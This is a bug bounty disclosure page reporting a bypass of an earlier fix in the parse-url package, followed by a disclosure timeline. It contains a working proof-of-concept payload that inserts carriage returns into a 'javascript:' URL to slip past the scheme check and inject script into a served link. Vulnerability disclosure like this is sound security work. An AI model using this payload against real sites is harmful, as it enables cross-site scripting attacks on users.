Bypass of last fix in ionicabizau/parse-url
Valid
Reported on
Jun 7th 2022
Description
last fix can be bypass because in this line we should consider the case \r\r
or even \r
too.
Proof of Concept
const http = require("http");
const parseUrl = require("parse-url");
const url = parseUrl('jav\r\r\rascript://%0aalert(1)');
console.log(url)
const server = http.createServer((request, response) => {
response.writeHead(200);
if (url.scheme !== "javascript" && url.scheme !== null) {
response.end("<a href=\'" + url.href + "\'>Wowww!</a>" );
}
else{
response.end("Nooo!");
}
});
server.listen(80, "127.0.0.1",function(){
console.log("http://"+this.address().address+":"+this.address().port);
});
Impact
attackers with this vulnerability can easily place any malicious JS code on webpages
We are processing your report and will contact the
ionicabizau/parse-url
team within 24 hours.
a year ago
amammad modified the report
a year ago
amammad modified the report
a year ago
amammad modified the report
a year ago
We have contacted a member of the
ionicabizau/parse-url
team and are waiting to hear back
a year ago
amammad modified the report
a year ago
:))
I struggle with that why I sent a perfect fix on another report of mine because I think this report can be fixed and ignored if we use my solution to patch this vulnerability on another report!
Is it possible to only get the bounty and don't release a CVE for this report, please?
We have sent a
follow up to the
ionicabizau/parse-url
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
ionicabizau/parse-url
team.
We will try again in 10 days.
a year ago
Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.
The researcher's credibility has increased: +7
to join this conversation